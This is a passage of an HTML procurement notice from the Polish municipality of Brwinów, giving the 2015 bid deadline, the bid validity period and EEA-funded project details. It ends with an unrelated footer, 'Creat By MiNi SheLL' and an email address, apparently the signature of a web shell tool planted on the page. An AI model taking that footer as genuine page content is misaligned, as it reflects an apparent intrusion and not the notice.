<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY BRWINÓW, 05-840 BRWINÓW UL. KOŚCIUSZKI 4A, pokój nr 22 - Zespół ds. zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.06.2015 godzina 13:00, miejsce: URZĄD GMINY BRWINÓW, 05-840 BRWINÓW, UL. GRODZISKA 12, Biuro Obsługi Interesanta - pokój nr 7.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt: Podwarszawskie Trójmiasto Ogrodów - poprawa spójności obszaru Podwarszawskiego Trójmiasta Ogrodów poprzez współpracę w zakresie polityki społecznej, kształtowania przestrzeni publicznej, gospodarki wodnej 
i komunikacji w ramach wdrażanego przez Ministerstwo Infrastruktury i Rozwoju Programu Regionalnego Rozwój miast poprzez wzmocnienie kompetencji jednostek samorządu terytorialnego, dialog społeczny oraz współpracę z przedstawicielami społeczeństwa obywatelskiego, dofinansowanego ze środków Mechanizmu Finansowego EOG i środków krajowych..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com